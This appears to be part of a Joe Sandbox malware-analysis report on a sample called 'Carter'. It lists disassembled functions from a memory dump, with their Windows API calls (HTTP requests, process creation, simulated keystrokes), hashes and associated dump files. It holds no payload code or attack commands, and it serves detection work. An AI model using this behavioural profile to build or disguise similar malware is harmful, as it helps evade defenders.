                                                                        • API String ID: 3430376129-0
                                                                        • Opcode ID: be52645d3af9dd0155ce8808ca4ea03e8dee5412fb2bec1eaf95b22202d7b600
                                                                        • Instruction ID: e5d8e729ec361de34454a51a62aedf992f9c2a86436b0ee7b23dcff5e4d92273
                                                                        • Opcode Fuzzy Hash: be52645d3af9dd0155ce8808ca4ea03e8dee5412fb2bec1eaf95b22202d7b600
                                                                        • Instruction Fuzzy Hash: 0A117C31940244BFEB715FA4EC08BE97BA6FB4A331F104361FAA5A50D9CB760951EF10
                                                                        Function 00FEAD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FEADE1
                                                                        • OleUninitialize.OLE32(?,00000000), ref: 00FEAE80
                                                                        • UnregisterHotKey.USER32(?), ref: 00FEAFD7
                                                                        • DestroyWindow.USER32(?), ref: 01022F64
                                                                        • FreeLibrary.KERNEL32(?), ref: 01022FC9
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 01022FF6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                        • String ID: close all
                                                                        • API String ID: 469580280-3243417748
                                                                        • Opcode ID: 19c6d9a2924bb0f805ccf7f5e8bab7d62602c667f32eb7b80ca751bd7efcec3f
                                                                        • Instruction ID: cfc1ba6742e8385c677b72c8b4d1cdc15d69bbef3888346c2848b19c43fedb3e
                                                                        • Opcode Fuzzy Hash: 19c6d9a2924bb0f805ccf7f5e8bab7d62602c667f32eb7b80ca751bd7efcec3f
                                                                        • Instruction Fuzzy Hash: 55A18C71701262CFCB69EF55C894B69F7A4BF04740F1042ACF98AAB261CB35AD12DF91
                                                                        Function 0103AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnumChildWindows.USER32(?,0103B13A), ref: 0103B078
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ChildEnumWindows
                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                        • API String ID: 3555792229-1603158881
                                                                        • Opcode ID: 5604dd98f4699bf888974b66cf3a8ac20ac7820aefde09a2f41da18259b21e10
                                                                        • Instruction ID: ffb41ed5bc5d5659f7b88942077099864a2e2c48f8158f3ccabd35b68b16b084
                                                                        • Opcode Fuzzy Hash: 5604dd98f4699bf888974b66cf3a8ac20ac7820aefde09a2f41da18259b21e10
                                                                        • Instruction Fuzzy Hash: 1191A370600106EEDB59EFA4C480BEDFBB8BF94304F508119E9DAE72A0DF306559DBA0
                                                                        Function 00FE31F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00FE327E
                                                                          • Part of subcall function 00FE218F: GetClientRect.USER32(?,?), ref: 00FE21B8
                                                                          • Part of subcall function 00FE218F: GetWindowRect.USER32(?,?), ref: 00FE21F9
                                                                          • Part of subcall function 00FE218F: ScreenToClient.USER32(?,?), ref: 00FE2221
                                                                        • GetDC.USER32 ref: 0101D073
                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0101D086
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0101D094
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0101D0A9
                                                                        • ReleaseDC.USER32(?,00000000), ref: 0101D0B1
                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0101D13C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                        • String ID: U
                                                                        • API String ID: 4009187628-3372436214
                                                                        • Opcode ID: ea2dfc48c6500e50ff0e409b2c13a3d645aacbfa60cab01cc928b3b9d78ce5b6
                                                                        • Instruction ID: 3ecfa322301682b100a9b6dbed135b6d486537ea116acc7fa82e70351c6f523c
                                                                        • Opcode Fuzzy Hash: ea2dfc48c6500e50ff0e409b2c13a3d645aacbfa60cab01cc928b3b9d78ce5b6
                                                                        • Instruction Fuzzy Hash: D571C631900245EFDF228FA8C888AAA7BB5FF49360F1442A9FED55715AC73A8941DF50
                                                                        Function 0106C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                          • Part of subcall function 00FE2714: GetCursorPos.USER32(?), ref: 00FE2727
                                                                          • Part of subcall function 00FE2714: ScreenToClient.USER32(010A77B0,?), ref: 00FE2744
                                                                          • Part of subcall function 00FE2714: GetAsyncKeyState.USER32(00000001), ref: 00FE2769
                                                                          • Part of subcall function 00FE2714: GetAsyncKeyState.USER32(00000002), ref: 00FE2777
                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0106C69C
                                                                        • ImageList_EndDrag.COMCTL32 ref: 0106C6A2
                                                                        • ReleaseCapture.USER32 ref: 0106C6A8
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 0106C752
                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0106C765
                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0106C847
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                        • API String ID: 1924731296-2107944366
                                                                        • Opcode ID: 74a306b2e0c45e3df9f17855826078ea8838a3f8fc7ecd62ef913d8225c27d9e
                                                                        • Instruction ID: f3e636503e3e84902b8e66b1868dc558015d8eeb39ea20f354b0ad54c4dcd20a
                                                                        • Opcode Fuzzy Hash: 74a306b2e0c45e3df9f17855826078ea8838a3f8fc7ecd62ef913d8225c27d9e
                                                                        • Instruction Fuzzy Hash: 7A519A70604305AFE720EF24CC55FAA7BE5FB88310F00861DF5D59B2A1CB7AA945DB92
                                                                        Function 010520E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0105211C
                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01052148
                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0105218A
                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0105219F
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 010521AC
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 010521DC
                                                                        • InternetCloseHandle.WININET(00000000), ref: 01052223
                                                                          • Part of subcall function 01052B4F: GetLastError.KERNEL32(?,?,01051EE3,00000000,00000000,00000001), ref: 01052B64
                                                                          • Part of subcall function 01052B4F: SetEvent.KERNEL32(?,?,01051EE3,00000000,00000000,00000001), ref: 01052B79
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                        • String ID:
                                                                        • API String ID: 2603140658-3916222277
                                                                        • Opcode ID: 978d7d97c879a9885c659315b0bc0d1a12fafb1ffdc6f21bae2d71a8df71441a
                                                                        • Instruction ID: 7f69b95c954a8ddb460455915faf5aad59823d9b1b328d732e3a990c86ecef09
                                                                        • Opcode Fuzzy Hash: 978d7d97c879a9885c659315b0bc0d1a12fafb1ffdc6f21bae2d71a8df71441a
                                                                        • Instruction Fuzzy Hash: 95417BB5901209BEEB929F54CC89FBB7BACFF08350F00415AFE84AA185D7759944CBA0
                                                                        Function 01059330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,01070980), ref: 01059412
                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,01070980), ref: 01059446
                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 010595C0
                                                                        • SysFreeString.OLEAUT32(?), ref: 010595EA
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                        • String ID:
                                                                        • API String ID: 560350794-0
                                                                        • Opcode ID: a6baa54ceca9bd85c10087ee1fcf61d4250877982d74b64a8d4c739cf5a0bd0f
                                                                        • Instruction ID: 162269b4903647da049865df6abcbef2ad6a7b1e654d5f4f38dd90d7d5ba6f0e
                                                                        • Opcode Fuzzy Hash: a6baa54ceca9bd85c10087ee1fcf61d4250877982d74b64a8d4c739cf5a0bd0f
                                                                        • Instruction Fuzzy Hash: 4EF14F71A00209EFDF54DF98C884EAEB7B9FF49318F108099F945AB255DB31AE45CB50
                                                                        Function 0105FD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0105FD9E
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0105FF31
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0105FF55
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0105FF95
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0105FFB7
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01060133
                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 01060165
                                                                        • CloseHandle.KERNEL32(?), ref: 01060194
                                                                        • CloseHandle.KERNEL32(?), ref: 0106020B
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                        • String ID:
                                                                        • API String ID: 4090791747-0
                                                                        • Opcode ID: 7893a01e8d00323b55669fea09152eb360da11308a7bbff5aa3865a3ac5d2b11
                                                                        • Instruction ID: 6b216f85081080a5a8df047d3d1b1b439b748fbab334989413853609b95db63c
                                                                        • Opcode Fuzzy Hash: 7893a01e8d00323b55669fea09152eb360da11308a7bbff5aa3865a3ac5d2b11
                                                                        • Instruction Fuzzy Hash: 5DE1BC312043429FD765EF28C890A6FBBE5AF85314F14895DF9C99B2A2CB35EC01CB52
                                                                        Function 0104527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01044BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01043B8A,?), ref: 01044BE0
                                                                          • Part of subcall function 01044BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01043B8A,?), ref: 01044BF9
                                                                          • Part of subcall function 01044FEC: GetFileAttributesW.KERNEL32(?,01043BFE), ref: 01044FED
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 010452FB
                                                                        • _wcscmp.LIBCMT ref: 01045315
                                                                        • MoveFileW.KERNEL32(?,?), ref: 01045330
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 793581249-0
                                                                        • Opcode ID: 527ede653dbc2112528623ae168235c9c8282be057caf553dabb7140cfcba4f7
                                                                        • Instruction ID: d747e59dfd052e5db13c03212ffd9c699c1ecbf5c9cd44dd798d4c13a74b8482
                                                                        • Opcode Fuzzy Hash: 527ede653dbc2112528623ae168235c9c8282be057caf553dabb7140cfcba4f7
                                                                        • Instruction Fuzzy Hash: 105171F24083859BD765EBA4DC809DFB7ECAF95201F10492EF2C9D7151EF34A2888766
                                                                        Function 01068C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 01068D24
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 634782764-0
                                                                        • Opcode ID: 6dfc2db023334dabf13447e261b1c7a169bbfe7b8a191f75ae559ec7bcbb3adc
                                                                        • Instruction ID: 255ee51090ea360c08d12922342c8e5a79517f17fe26bc635bacc631f36d90bb
                                                                        • Opcode Fuzzy Hash: 6dfc2db023334dabf13447e261b1c7a169bbfe7b8a191f75ae559ec7bcbb3adc
                                                                        • Instruction Fuzzy Hash: 8D51B070640308BFEF70AE28CC88B9D7FACAB15320F148653F695EB195C776A980CB50
                                                                        Function 00FE2F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0101C638
                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0101C65A
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0101C672
                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0101C690
                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0101C6B1
                                                                        • DestroyIcon.USER32(00000000), ref: 0101C6C0
                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0101C6DD
                                                                        • DestroyIcon.USER32(?), ref: 0101C6EC
                                                                          • Part of subcall function 0106AAD4: DeleteObject.GDI32(00000000), ref: 0106AB0D
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                        • String ID:
                                                                        • API String ID: 2819616528-0
                                                                        • Opcode ID: 4d00bada280271d248718c88d013d0f59f7f908a94ee969bdd71557e33e96766
                                                                        • Instruction ID: 7aa16f96fc242eb9ce0def4bdc5ea495dad0ceffa45793257e5c4fec2ec9a5b4
                                                                        • Opcode Fuzzy Hash: 4d00bada280271d248718c88d013d0f59f7f908a94ee969bdd71557e33e96766
                                                                        • Instruction Fuzzy Hash: 7E518E70A40245AFEB60DF25CD45BAA7BF9FB48710F104618F982E7294EB75E890EB50
                                                                        Function 0103A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0103B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0103B54D
                                                                          • Part of subcall function 0103B52D: GetCurrentThreadId.KERNEL32 ref: 0103B554
                                                                          • Part of subcall function 0103B52D: AttachThreadInput.USER32(00000000,?,0103A23B,?,00000001), ref: 0103B55B
                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0103A246
                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0103A263
                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0103A266
                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0103A26F
                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0103A28D
                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0103A290
                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0103A299
                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0103A2B0
                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0103A2B3
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                        • String ID:
                                                                        • API String ID: 2014098862-0
                                                                        • Opcode ID: 6d5975cf6b7169f365754d144548da0901002d3e80e5b9ae7ba7035ebab4fed7
                                                                        • Instruction ID: 006adae5badd06a289a3bc6269e4e1866cccb982d84bbfe08e7e533c011521cc
                                                                        • Opcode Fuzzy Hash: 6d5975cf6b7169f365754d144548da0901002d3e80e5b9ae7ba7035ebab4fed7
                                                                        • Instruction Fuzzy Hash: B6110871950218BEF6206F649C49F6A3F1DDB8D764F201519F380AB0C4C9F75C50CBA0
                                                                        Function 010394D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0103915A,00000B00,?,?), ref: 010394E2
                                                                        • HeapAlloc.KERNEL32(00000000,?,0103915A,00000B00,?,?), ref: 010394E9
                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0103915A,00000B00,?,?), ref: 010394FE
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,0103915A,00000B00,?,?), ref: 01039506
                                                                        • DuplicateHandle.KERNEL32(00000000,?,0103915A,00000B00,?,?), ref: 01039509
                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0103915A,00000B00,?,?), ref: 01039519
                                                                        • GetCurrentProcess.KERNEL32(0103915A,00000000,?,0103915A,00000B00,?,?), ref: 01039521
                                                                        • DuplicateHandle.KERNEL32(00000000,?,0103915A,00000B00,?,?), ref: 01039524
                                                                        • CreateThread.KERNEL32(00000000,00000000,0103954A,00000000,00000000,00000000), ref: 0103953E
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                        • String ID:
                                                                        • API String ID: 1957940570-0
                                                                        • Opcode ID: 605ad17026970d1ffc4d85182382c5b848b2040e99cc9dd319aae081c4a0c192
                                                                        • Instruction ID: f63e15ff475144235eef531a6d3ca1806d38550f4cf3b39d2121d32a97b19493
                                                                        • Opcode Fuzzy Hash: 605ad17026970d1ffc4d85182382c5b848b2040e99cc9dd319aae081c4a0c192
                                                                        • Instruction Fuzzy Hash: E801CDB5640304BFE720AFA5EC4DF6B7BACEB89711F004511FA45EB199CAB69800CB30
                                                                        Function 0105A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                        • API String ID: 0-572801152
                                                                        • Opcode ID: fb97cc94be901eb27466b5ee02b354df80abbb098ba35b6ccc8d869b193f1227
